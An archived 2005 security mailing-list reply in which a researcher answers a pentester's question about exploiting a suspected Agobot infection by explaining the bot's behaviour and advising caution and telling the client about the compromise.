From: Dave Dittrich (dittrich@u.washington.edu)
Date: Tue Sep 13 2005 - 19:19:00 EDT
> I'm pentesting a client's network and I have found a Windows NT4 machine
> with ports 620 and 621 TCP ports open.
>
> According to what I have found, this behaviour would mean the presence of
> the Agobot worm.
First, Agobot is not exactly a "worm", per se, although it can
be programmed to act like a worm. It is a bot, "blended threat",
or "remote control trojan on steriods," but not really a worm like
Sasser, Blaster, Slammer, etc.
> When I netcat this port, it returns garbage binary strings. When I connect
> to port 113 (auth), it replies with random USERIDs.
As a general rule, it isn't wise to poke around ports on a compromised
host without knowing exactly what is going on. The port that returns
you "garbage" characters is a file transfer, and that file transfer is
logged to the channel (allowing the attacker a feedback loop.)
(If you were capturing network traffic to/from that host, look for
your IP address in the IRC channel traffic and you'll see it. :)
> Does anyone knows a way to exploit this worm to get access to the system?
Assuming you are correct that it is Agobot, there may be options, but
then you wouldn't know if the attacker has changed anything that would
make the bot harder to take over. Have you tried getting someone with
administrative access to look at the host? If you're doing a pen
test, and you discover that the client's network is already
compromised, hadn't you better inform them of this now?
-- Dave Dittrich Information Assurance Researcher, dittrich@u.washington.edu The iSchool http://staff.washington.edu/dittrich University of Washington PGP key http://staff.washington.edu/dittrich/pgpkey.txt Fingerprint FE97 0C57 0843 F3EB 49A1 0CD0 8E0C D0BE C838 CCB5 ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 -------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:53 EDT